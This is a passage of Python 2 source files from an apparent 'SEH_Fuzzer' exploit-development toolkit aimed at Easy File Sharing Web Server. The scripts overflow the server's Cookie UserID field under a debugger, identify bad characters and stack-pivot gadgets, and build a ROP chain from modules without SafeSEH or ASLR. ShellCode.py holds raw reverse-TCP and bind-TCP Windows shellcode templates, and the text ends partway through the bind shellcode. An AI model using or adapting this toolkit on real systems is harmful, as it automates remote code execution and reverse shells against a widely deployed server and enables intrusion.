 18 | import threading
 19 | import time
 20 | 
 21 | host, port = "127.0.0.1", 80
 22 | 
 23 | global Running
 24 | global lock
 25 | global chance
 26 | global MAX_OFFSET
 27 | global OFFSET
 28 | global badchars
 29 | 
 30 | def bytearray(badchars="\x00"):
 31 | 	pattern = ""
 32 | 	for c in xrange(0, 0xff+1):
 33 | 		if chr(c) not in badchars:
 34 | 			pattern += chr(c)
 35 | 	return pattern
 36 | 
 37 | def find_badchar(stack, pattern):
 38 | 	for i in xrange(1, len(pattern)):
 39 | 		if stack.find(pattern[:i])==-1:
 40 | 			return pattern[i-1]
 41 | 	return None
 42 | 
 43 | chance = 1
 44 | Running = True
 45 | badchars = "\x00"
 46 | lock = threading.Lock()
 47 | 
 48 | def check_access_validation(dbg):
 49 | 	global chance
 50 | 	global Running
 51 | 	global lock
 52 | 	global badchars
 53 | 
 54 | 	with lock:
 55 | 		if dbg.dbg.u.Exception.dwFirstChance:
 56 | 			chance -= 1
 57 | 			# prevent test next size.
 58 | 			Running = False
 59 | 			if chance==0:
 60 | 				Running = False
 61 | 				crash_info = dbg.dump_context_list(stack_depth=(OFFSET+1000)/4)
 62 | 				stack_info = ""
 63 | 
 64 | 				for a in xrange(0, OFFSET+1000, 4):
 65 | 					key = "esp+0" + hex(a)[2:] if len(hex(a))<4 else "esp+" + hex(a)[2:]
 66 | 					stack_info += p32(crash_info[key]["value"])
 67 | 				
 68 | 				# print stack_info
 69 | 				badchar = find_badchar(stack_info, bytearray(badchars=badchars))
 70 | 				if badchar is None:
 71 | 					bcs = [hex(ord(c)) for c in badchars]
 72 | 					print "[+] find all badchars: %s" % bcs
 73 | 				
 74 | 				else:
 75 | 					print hex(ord(badchar))
 76 | 					badchars += badchar
 77 | 					with open(PICKLE_NAME, "wb") as local_file:
 78 | 						print "write ", PICKLE_NAME
 79 | 						cPickle.dump(badchars, local_file)
 80 | 
 81 | 				dbg.terminate_process()
 82 | 				return DBG_EXCEPTION_NOT_HANDLED
 83 | 			else:
 84 | 				Running = True
 85 | 			return DBG_EXCEPTION_NOT_HANDLED
 86 | 
 87 | 		return DBG_EXCEPTION_NOT_HANDLED
 88 | 
 89 | class Fuzzer(object):
 90 | 	def __init__(self, exe_path, max_offset = 8000):
 91 | 		self.exe_path = exe_path
 92 | 		self.pid = None
 93 | 		self.dbg = None
 94 | 		# self.running = True
 95 | 		
 96 | 		self.dbgThread = threading.Thread(target=self.start_debugger)
 97 | 		self.dbgThread.setDaemon(False)
 98 | 		self.dbgThread.start()
 99 | 		
100 | 		# Wait debugger start process
101 | 		while self.pid is None:
102 | 			time.sleep(1)
103 | 		
104 | 		self.monitorThread = threading.Thread(target=self.monitor_debugger)
105 | 		self.monitorThread.setDaemon(False)
106 | 		self.monitorThread.start()
107 | 			
108 | 	def monitor_debugger(self):
109 | 		global Running
110 | 		global OFFSET
111 | 		global badchars
112 | 
113 | 		with open(LAST_PICKLE_NAME, "rb") as local_file:
114 | 			OFFSET = cPickle.load(local_file)
115 | 			seh_offset = cPickle.load(local_file)
116 | 			seh = cPickle.load(local_file)
117 | 			nseh = cPickle.load(local_file)
118 | 
119 | 		if not os.path.isfile(PICKLE_NAME):
120 | 			with open(PICKLE_NAME, "wb") as local_file:
121 | 				cPickle.dump("\x00", local_file)
122 | 
123 | 		else:
124 | 			with open(PICKLE_NAME, "rb") as local_file:
125 | 				badchars = cPickle.load(local_file)
126 | 		raw_input("[+] Please start the debugger...")
127 | 		while  Running:
128 | 			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
129 | 			s.connect((host, port))
130 | 			buffer = "A" * OFFSET
131 | 			buffer += bytearray(badchars=badchars)
132 | 
133 | 			httpreq = (
134 | 				"GET /changeuser.ghp HTTP/1.1\r\n"
135 | 				"User-Agent: Mozilla/4.0\r\n"
136 | 				"Host:" + host + ":" + str(port) + "\r\n"
137 | 				"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
138 | 				"Accept-Language: en-us\r\n"
139 | 				"Accept-Encoding: gzip, deflate\r\n"
140 | 				"Referer: http://" + host + "/\r\n"
141 | 				"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
142 | 				"Conection: Keep-Alive\r\n\r\n"
143 | 			)
144 | 			s.send(httpreq)
145 | 			s.close()
146 | 			Running = False
147 | 			
148 | 	'''
149 | 		Try to start debugger and run it.
150 | 	'''
151 | 	def start_debugger(self):
152 | 		try:
153 | 			self.dbg = pydbg()
154 | 			self.dbg.load(self.exe_path)
155 | 			self.pid = self.dbg.pid
156 | 		except pdx:
157 | 			print "[+] Can't open file, please check file path"
158 | 			sys.exit(1)
159 | 		except Exception as e:
160 | 			print "[+] Unknow error: ", str(e)
161 | 			sys.exit(1)
162 | 
163 | 		self.dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, check_access_validation)
164 | 		self.dbg.run()
165 | 		
166 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
167 | Fuzzer(exe_path)


--------------------------------------------------------------------------------
/SEH_Fuzzer/test/PE.py:
--------------------------------------------------------------------------------
  1 | import pefile
  2 | 
  3 | '''
  4 | 	Windows PE file arch code.
  5 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#machine_types
  6 | '''
  7 | class ArchFlag:
  8 | 	IMAGE_FILE_MACHINE_UNKNOWN	= 0x0
  9 | 	IMAGE_FILE_MACHINE_AMD64 	= 0x8664
 10 | 	IMAGE_FILE_MACHINE_I386  	= 0x14c
 11 | 	IMAGE_FILE_MACHINE_IA64  	= 0x200
 12 | 	
 13 | '''
 14 | 	Get PE file characteristics.
 15 | 	Can grad some characteristics of PE file.
 16 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#characteristics
 17 | '''
 18 | class FileHeaderCharacteristicsFlag:
 19 | 	IMAGE_FILE_RELOCS_STRIPPED = 0x1
 20 | 	IMAGE_FILE_32BIT_MACHINE   = 0x100
 21 | 	IMAGE_FILE_SYSTEM		   = 0x1000
 22 | 	IMAGE_FILE_DLL 			   = 0x2000
 23 | 	
 24 | '''
 25 | 	Get file bits.
 26 | '''
 27 | class MagicFlag:
 28 | 	PE32 	 = 0x10b	# for 32bit
 29 | 	PE32plus = 0x20b	# for 64bit
 30 | 	
 31 | '''
 32 | 	Get DLL characteristics.
 33 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#dll_characteristics
 34 | '''
 35 | class DllCharacteristicsFlag:
 36 | 	IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x40
 37 | 	IMAGE_DLLCHARACTERISTICS_NX_COMPAT    = 0x100
 38 | 	IMAGE_DLLCHARACTERISTICS_NO_SEH      = 0x400
 39 | 	
 40 | '''
 41 | 	Section Flag Definition.
 42 | 	Ref: https://msdn.microsoft.com/zh-tw/library/windows/desktop/ms680547(v=vs.85).aspx#section_flags
 43 | '''
 44 | class SectionFlag:
 45 | 	IMAGE_SCN_MEM_EXECUTE = 0x20000000
 46 | 	IMAGE_SCN_MEM_READ = 0x40000000
 47 | 	IMAGE_SCN_MEM_WRITE = 0x80000000
 48 | 	
 49 | '''
 50 | 	PE parse error exception, will add a message about error.
 51 | '''
 52 | class PEError(Exception):
 53 | 	def __init__(self, message="Parse PE file fail"):
 54 | 		self.message = message
 55 | 		
 56 | 	def __str__(self):
 57 | 		return repr(self.message)
 58 | 	
 59 | class PE(object):
 60 | 	def __init__(self, exe_path):
 61 | 		self.__name = exe_path
 62 | 		self.__parser = None
 63 | 		self.__format = "PE"
 64 | 		try:
 65 | 			self.__parser = pefile.PE(exe_path, fast_load=True)
 66 | 		except:
 67 | 			# print "[-] Open %s fail." % (self.Name)
 68 | 			self.__parser = None
 69 | 			raise PEError("[-] Open %s fail." % (self.Name))
 70 | 		
 71 | 		self.Arch = self.__parser.FILE_HEADER.Machine
 72 | 		self.__type = "dll" if self.__parser.FILE_HEADER.Characteristics & FileHeaderCharacteristicsFlag.IMAGE_FILE_DLL else "exe"
 73 | 		
 74 | 		if self.__type == "exe" and (self.__parser.FILE_HEADER.Characteristics & FileHeaderCharacteristicsFlag.IMAGE_FILE_RELOCS_STRIPPED):
 75 | 			self.__rebase = False
 76 | 		elif self.__type == "dll" and not (self.__parser.OPTIONAL_HEADER.DllCharacteristics & DllCharacteristicsFlag.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE):
 77 | 			self.__rebase = False
 78 | 		else:
 79 | 			self.__rebase = True
 80 | 		
 81 | 		if self.__parser.OPTIONAL_HEADER.Magic & MagicFlag.PE32:
 82 | 			self.__bits = 32
 83 | 		elif self.__parser.OPTIONAL_HEADER.Magic & MagicFlag.PE32plus:
 84 | 			self.__bits = 64
 85 | 		
 86 | 		self.__dataSections = None
 87 | 		self.__execSections = None
 88 | 		
 89 | 		self.__getDataSections()
 90 | 		self.__getExecSections()
 91 | 		
 92 | 		self.__parser.close()
 93 | 		
 94 | 	def __getDataSections(self):
 95 | 		dataSections = []
 96 | 		for section in self.__parser.sections:
 97 | 			if section.Characteristics & SectionFlag.IMAGE_SCN_MEM_WRITE:
 98 | 				dataSections.append({
 99 | 					"name" : section.Name,
100 | 					"offset" : section.PointerToRawData,
101 | 					"size" : section.SizeOfRawData,
102 | 					"vaddr" : section.VirtualAddress + self.__parser.OPTIONAL_HEADER.ImageBase,
103 | 					"code" : str(section.get_data())
104 | 				})
105 | 		self.__dataSections = dataSections
106 | 		
107 | 	def __getExecSections(self):
108 | 		execSections = []
109 | 		for section in self.__parser.sections:
110 | 			if section.Characteristics & SectionFlag.IMAGE_SCN_MEM_EXECUTE:
111 | 				execSections.append({
112 | 					"name" : section.Name,
113 | 					"offset" : section.PointerToRawData,
114 | 					"size" : section.SizeOfRawData,
115 | 					"vaddr" : section.VirtualAddress + self.__parser.OPTIONAL_HEADER.ImageBase,
116 | 					"code" : bytes(section.get_data())
117 | 				})
118 | 		self.__execSections = execSections
119 | 		
120 | 	@property
121 | 	def Arch(self):
122 | 		return self.__Arch
123 | 	
124 | 	@Arch.setter
125 | 	def Arch(self, flag):
126 | 		self.__Arch = { ArchFlag.IMAGE_FILE_MACHINE_UNKNOWN : "All",
127 | 				 ArchFlag.IMAGE_FILE_MACHINE_AMD64 	 : "amd64",
128 | 				 ArchFlag.IMAGE_FILE_MACHINE_I386  	 : "intel",
129 | 				 ArchFlag.IMAGE_FILE_MACHINE_IA64  	 : "ia64" }.get(flag, "unknow")
130 | 	
131 | 	@property
132 | 	def Bits(self):
133 | 		return self.__bits
134 | 	
135 | 	@property
136 | 	def DataSections(self):
137 | 		return self.__dataSections
138 | 		
139 | 	@property
140 | 	def ExecSections(self):
141 | 		return self.__execSections
142 | 		
143 | 	@property
144 | 	def EntryPoint(self):
145 | 		return self.__parser.OPTIONAL_HEADER.ImageBase + self.__parser.OPTIONAL_HEADER.AddressOfEntryPoint
146 | 	
147 | 	@property
148 | 	def Format(self):
149 | 		return self.__format
150 | 	
151 | 	@property 
152 | 	def Rebase(self):
153 | 		return self.__rebase
154 | 		
155 | 	@property
156 | 	def Name(self):
157 | 		return self.__name
158 | 	
159 | 	@property
160 | 	def Type(self):
161 | 		return self.__type
162 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/stack_pivot.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import time
  3 | import sys
  4 | import socket
  5 | import cPickle
  6 | import os
  7 | 
  8 | from pydbg import *
  9 | from pydbg.defines import *
 10 | 
 11 | from util import *
 12 | 
 13 | GADGET_PICKLE = "gadgets.pkl"
 14 | LAST_PICKLE_NAME = "crash_info.pkl"
 15 | PICKLE_NAME = "stackpivot.pkl"
 16 | 
 17 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 18 | 
 19 | import threading
 20 | import time
 21 | 
 22 | host, port = "127.0.0.1", 80
 23 | 
 24 | global Running
 25 | global lock
 26 | global chance
 27 | global MAX_OFFSET
 28 | global OFFSET
 29 | 
 30 | chance = 2
 31 | Running = True
 32 | lock = threading.Lock()
 33 | 
 34 | def find_stackpivot(stack):
 35 | 	overflow = 0
 36 | 	start_offset = 0
 37 | 	start_value = ""
 38 | 	for depth, value in stack:
 39 | 		if value == "0x41414141":
 40 | 			overflow += 1
 41 | 		else:
 42 | 			overflow = 0
 43 | 		if overflow == 0:
 44 | 			start_offset, start_value = depth, value
 45 | 		if overflow == 10:
 46 | 			deep = int("0x"+depth.split("+")[-1], base=16) - 4*9
 47 | 			# start_offset = int("0x"+start_offset.split("+")[-1], base=16) - 4*9
 48 | 			if start_value.startswith("0x414141"):
 49 | 				fix = 3
 50 | 			elif start_value.startswith("0x4141"):
 51 | 				fix = 2
 52 | 			elif start_value.startswith("0x41"):
 53 | 				fix = 1
 54 | 			else:
 55 | 				fix = 0
 56 | 			# print "find", deep, fix
 57 | 			return deep, fix
 58 | 
 59 | def check_access_validation(dbg):
 60 | 	global chance
 61 | 	global Running
 62 | 	global lock
 63 | 
 64 | 	with lock:
 65 | 		if dbg.dbg.u.Exception.dwFirstChance:
 66 | 			chance -= 1
 67 | 			# prevent test next size.
 68 | 			Running = False
 69 | 			if chance==0:
 70 | 				Running = False
 71 | 				crash_info = dbg.dump_context_list(stack_depth=OFFSET/4)
 72 | 				stack_info = []
 73 | 
 74 | 				for a in xrange(0, OFFSET, 4):
 75 | 					key = "esp+0" + hex(a)[2:] if len(hex(a))<4 else "esp+" + hex(a)[2:]
 76 | 					stack_info.append((key, hex(crash_info[key]["value"])))
 77 | 
 78 | 				deep, fix = find_stackpivot(stack_info)
 79 | 				move_up_list = []
 80 | 				with open(GADGET_PICKLE, "rb") as local_file:
 81 | 					gadgets = cPickle.load(local_file)
 82 | 					for addr, insturctions in gadgets["addnum"].items():
 83 | 						if insturctions.startswith("add esp,") and insturctions.find("pop") == -1:
 84 | 							move_up = int(insturctions.split(" ; ")[0].split(",")[1].strip(), base=16)
 85 | 							if move_up>=deep:
 86 | 								move_up_list.append((addr, insturctions, deep))
 87 | 
 88 | 				select_moveup = None
 89 | 				for g in move_up_list:
 90 | 					if select_moveup is None or select_moveup[2]>g[2]:
 91 | 						select_moveup = g
 92 | 				# print select_moveup
 93 | 
 94 | 				with open(PICKLE_NAME, "wb") as local_file:
 95 | 					cPickle.dump({select_moveup[0] : select_moveup[1]}, local_file)
 96 | 					cPickle.dump(select_moveup[2], local_file)
 97 | 					cPickle.dump(fix, local_file)
 98 | 
 99 | 				# print dbg.dump_context(stack_depth=1000)
100 | 				dbg.terminate_process()
101 | 				return DBG_EXCEPTION_NOT_HANDLED
102 | 			else:
103 | 				Running = True
104 | 			return DBG_EXCEPTION_NOT_HANDLED
105 | 
106 | 		return DBG_EXCEPTION_NOT_HANDLED
107 | 
108 | class Fuzzer(object):
109 | 	def __init__(self, exe_path, max_offset = 8000):
110 | 		self.exe_path = exe_path
111 | 		self.pid = None
112 | 		self.dbg = None
113 | 		# self.running = True
114 | 		
115 | 		self.dbgThread = threading.Thread(target=self.start_debugger)
116 | 		self.dbgThread.setDaemon(False)
117 | 		self.dbgThread.start()
118 | 		
119 | 		# Wait debugger start process
120 | 		while self.pid is None:
121 | 			time.sleep(1)
122 | 		
123 | 		self.monitorThread = threading.Thread(target=self.monitor_debugger)
124 | 		self.monitorThread.setDaemon(False)
125 | 		self.monitorThread.start()
126 | 			
127 | 	def monitor_debugger(self):
128 | 		global Running
129 | 		global OFFSET
130 | 
131 | 		with open(LAST_PICKLE_NAME, "rb") as local_file:
132 | 			OFFSET = cPickle.load(local_file)
133 | 			seh_offset = cPickle.load(local_file)
134 | 			seh = cPickle.load(local_file)
135 | 			nseh = cPickle.load(local_file)
136 | 
137 | 		raw_input("[+] Please start the debugger...")
138 | 		while  Running:
139 | 			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
140 | 			s.connect((host, port))
141 | 			buffer = "A" * 4300
142 | 			httpreq = (
143 | 				"GET /changeuser.ghp HTTP/1.1\r\n"
144 | 				"User-Agent: Mozilla/4.0\r\n"
145 | 				"Host:" + host + ":" + str(port) + "\r\n"
146 | 				"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
147 | 				"Accept-Language: en-us\r\n"
148 | 				"Accept-Encoding: gzip, deflate\r\n"
149 | 				"Referer: http://" + host + "/\r\n"
150 | 				"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
151 | 				"Conection: Keep-Alive\r\n\r\n"
152 | 			)
153 | 			s.send(httpreq)
154 | 			s.close()
155 | 			Running = False
156 | 			
157 | 	'''
158 | 		Try to start debugger and run it.
159 | 	'''
160 | 	def start_debugger(self):
161 | 		try:
162 | 			self.dbg = pydbg()
163 | 			self.dbg.load(self.exe_path)
164 | 			self.pid = self.dbg.pid
165 | 		except pdx:
166 | 			print "[+] Can't open file, please check file path"
167 | 			sys.exit(1)
168 | 		except Exception as e:
169 | 			print "[+] Unknow error: ", str(e)
170 | 			sys.exit(1)
171 | 
172 | 		self.dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, check_access_validation)
173 | 		self.dbg.run()
174 | 		
175 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
176 | Fuzzer(exe_path)


--------------------------------------------------------------------------------
/SEH_Fuzzer/fuzzer.py:
--------------------------------------------------------------------------------
  1 | from PE import *
  2 | from util import *
  3 | from Gadget import *
  4 | import struct
  5 | 
  6 | import sys
  7 | import platform
  8 | import os
  9 | 
 10 | from pydbg import *
 11 | from pydbg.defines import *
 12 | 
 13 | import cPickle
 14 | import random
 15 | 
 16 | PICKLE_GADGET = "gadgets.pkl"
 17 | ROPCHAIN = "ropchain.pkl"
 18 | 
 19 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 20 | 
 21 | import threading
 22 | import time
 23 | 
 24 | win7After = True if platform.release() in ["6", "7", "8", "vista", "win7", "2008server", "win8", "win8.1", "win10"] else False
 25 | 
 26 | # Get module list without system module.
 27 | def getModuleList(dbg, exe_path):
 28 | 	system_dlls = dbg.system_dlls
 29 | 	file_prefix = "\\".join(exe_path.split("\\")[1:-1])
 30 | 	disk = exe_path[0:2]
 31 | 	ModulesList = [exe_path]
 32 | 
 33 | 	for dll in system_dlls:
 34 | 		if file_prefix in dll.path:
 35 | 			ModulesList.append(disk + dll.path)
 36 | 
 37 | 	return ModulesList
 38 | 
 39 | # Get gadget by no protect module, IAT and wriatable address.
 40 | def getRopGadgetAndIATAndWriteAddress(dbg, ModulesList):
 41 | 	# Get all usable gadgets.
 42 | 	collect_gadgets = {}
 43 | 	IAT = {}
 44 | 	wriatableAddress = {}
 45 | 
 46 | 	for module in ModulesList:
 47 | 		pe = PE(module)
 48 | 		image_top = pe.Base + pe.BaseSize
 49 | 		if pe.Base>0:
 50 | 			peOffset = struct.unpack("<L", dbg.read(pe.Base+0x3c, 4))[0]
 51 | 			base = pe.Base + peOffset
 52 | 			safeseh_offset = [0x5f, 0x5f, 0x5e]
 53 | 			safeseh_flag = [0x4, 0x4, 0x400]
 54 | 			os_index = 2 if win7After else 0
 55 | 			module_flag = struct.unpack("<H", dbg.read(base+safeseh_offset[os_index], 2))[0]
 56 | 			# check safeSEH
 57 | 			safeSEH = True if module_flag & safeseh_flag[os_index] else False
 58 | 			# check ASLR
 59 | 			ASLR = True if module_flag & 0x0040 else False
 60 | 			# check NX
 61 | 			NX = True if module_flag & 0x0100 else False
 62 | 		
 63 | 		if (not safeSEH) and (not ASLR):
 64 | 			module_name = module.lower()
 65 | 			Rebase = True
 66 | 			# Check whether module Rebase is open.
 67 | 			for mod in dbg.enumerate_modules():
 68 | 				if module_name.endswith(mod[0].lower()) and mod[1] == pe.Base:
 69 | 					Rebase = False
 70 | 					break
 71 | 			if not Rebase:
 72 | 				print "[+] Module %s add." % module
 73 | 				module_gadget = Gadget(pe)
 74 | 				classify_gadget(module_gadget.retGadgets, module_gadget.jmpGadgets, collect_gadgets)
 75 | 				IAT.update( { module : pe.IAT } )
 76 | 				for section in pe.DataSections:
 77 | 					for test in xrange(5):
 78 | 						vaddr = section["vaddr"] + random.randint(0,section["size"])
 79 | 						if gadget_filter(vaddr):
 80 | 							wriatableAddress.update( { vaddr : module } )
 81 | 							break
 82 | 	return collect_gadgets, IAT, wriatableAddress
 83 | 
 84 | class Fuzzer(object):
 85 | 	def __init__(self, exe_path):
 86 | 		self.exe_path = exe_path
 87 | 		self.pid = None
 88 | 		self.dbg = None
 89 | 		self.running = True
 90 | 		self.pe = PE(exe_path)
 91 | 		self.gadgets = Gadget(self.pe)
 92 | 		
 93 | 		self.dbgThread = threading.Thread(target=self.start_debugger)
 94 | 		self.dbgThread.setDaemon(False)
 95 | 		self.dbgThread.start()
 96 | 		
 97 | 		# Wait debugger start process
 98 | 		while self.pid is None:
 99 | 			time.sleep(1)
100 | 		
101 | 		self.monitorThread = threading.Thread(target=self.monitor_debugger)
102 | 		self.monitorThread.setDaemon(False)
103 | 		self.monitorThread.start()
104 | 			
105 | 	def monitor_debugger(self):
106 | 		while self.running:		
107 | 			self.ModulesList = getModuleList(self.dbg, self.exe_path)
108 | 			'''
109 | 			for l in self.ModulesList:
110 | 				print l
111 | 			'''
112 | 			print "[+] Get no protect modules."
113 | 			global PICKLE_GADGET
114 | 			# PICKLE_GADGET = self.exe_path.split("\\")[-1].replace(".exe", ".pkl")
115 | 			
116 | 
117 | 			# if first analysis.
118 | 			if not os.path.isfile(PICKLE_GADGET):
119 | 				with open(PICKLE_GADGET, "wb") as local_file:
120 | 					collect_gadgets, IAT, wriatableAddress = getRopGadgetAndIATAndWriteAddress(self.dbg, self.ModulesList)
121 | 					cPickle.dump(collect_gadgets, local_file)
122 | 					cPickle.dump(IAT, local_file)
123 | 					cPickle.dump(wriatableAddress, local_file)
124 | 			
125 | 			else:
126 | 				with open(PICKLE_GADGET, "rb") as local_file:
127 | 					collect_gadgets = cPickle.load(local_file)
128 | 					IAT = cPickle.load(local_file)
129 | 					wriatableAddress = cPickle.load(local_file)
130 | 			
131 | 
132 | 			print "[+] Get Rop Gadget."
133 | 			
134 | 			# cPickle.dump()
135 | 			rop_chain = generate_ropchain(collect_gadgets, IAT, wriatableAddress)
136 | 			with open(ROPCHAIN, "wb") as local_file:
137 | 				cPickle.dump(rop_chain, local_file)
138 | 			print
139 | 			print "[+] ROP Chain"
140 | 			print "ropchain = [ "
141 | 			for a,b in rop_chain:
142 | 				print '   ',hex(a), ", #", b
143 | 			print "]"
144 | 			print
145 | 
146 | 			self.running = False
147 | 			
148 | 		# close debugger
149 | 		self.dbg.terminate_process()
150 | 			
151 | 		
152 | 	'''
153 | 		Try to start debugger and run it.
154 | 	'''
155 | 	def start_debugger(self):
156 | 		try:
157 | 			self.dbg = pydbg()
158 | 			self.dbg.load(self.exe_path)
159 | 			self.pid = self.dbg.pid
160 | 		except pdx:
161 | 			print "[+] Can't open file, please check file path"
162 | 			sys.exit(1)
163 | 		except Exception as e:
164 | 			print "[+] Unknow error: ", str(e)
165 | 			sys.exit(1)
166 | 		
167 | 		self.dbg.run()
168 | 		
169 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
170 | Fuzzer(exe_path)


--------------------------------------------------------------------------------
/SEH_Fuzzer/ShellCode.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import struct
  3 | 
  4 | REVERSE_TCP_FORMAT  = ""
  5 | REVERSE_TCP_FORMAT += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
  6 | REVERSE_TCP_FORMAT += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
  7 | REVERSE_TCP_FORMAT += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
  8 | REVERSE_TCP_FORMAT += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
  9 | REVERSE_TCP_FORMAT += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
 10 | REVERSE_TCP_FORMAT += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
 11 | REVERSE_TCP_FORMAT += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
 12 | REVERSE_TCP_FORMAT += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
 13 | REVERSE_TCP_FORMAT += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
 14 | REVERSE_TCP_FORMAT += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
 15 | REVERSE_TCP_FORMAT += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
 16 | REVERSE_TCP_FORMAT += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
 17 | REVERSE_TCP_FORMAT += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
 18 | REVERSE_TCP_FORMAT += "\xff\xd5\x6a\x05\x68%s"
 19 | REVERSE_TCP_FORMAT += "\x68\x02\x00%s"
 20 | REVERSE_TCP_FORMAT += "\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
 21 | REVERSE_TCP_FORMAT += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
 22 | REVERSE_TCP_FORMAT += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
 23 | REVERSE_TCP_FORMAT += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
 24 | REVERSE_TCP_FORMAT += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
 25 | REVERSE_TCP_FORMAT += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
 26 | REVERSE_TCP_FORMAT += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
 27 | REVERSE_TCP_FORMAT += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
 28 | REVERSE_TCP_FORMAT += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
 29 | REVERSE_TCP_FORMAT += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
 30 | REVERSE_TCP_FORMAT += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
 31 | REVERSE_TCP_FORMAT += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
 32 | 
 33 | 
 34 | BIND_TCP_FORMAT =  ""
 35 | BIND_TCP_FORMAT += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
 36 | BIND_TCP_FORMAT += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
 37 | BIND_TCP_FORMAT += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
 38 | BIND_TCP_FORMAT += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
 39 | BIND_TCP_FORMAT += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
 40 | BIND_TCP_FORMAT += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
 41 | BIND_TCP_FORMAT += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
 42 | BIND_TCP_FORMAT += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
 43 | BIND_TCP_FORMAT += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
 44 | BIND_TCP_FORMAT += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
 45 | BIND_TCP_FORMAT += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
 46 | BIND_TCP_FORMAT += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
 47 | BIND_TCP_FORMAT += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
 48 | BIND_TCP_FORMAT += "\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68"
 49 | BIND_TCP_FORMAT += "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00%s\x89"
 50 | BIND_TCP_FORMAT += "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85"
 51 | BIND_TCP_FORMAT += "\xc0\x75\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68"
 52 | BIND_TCP_FORMAT += "\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61"
 53 | BIND_TCP_FORMAT += "\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
 54 | BIND_TCP_FORMAT += "\xff\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00"
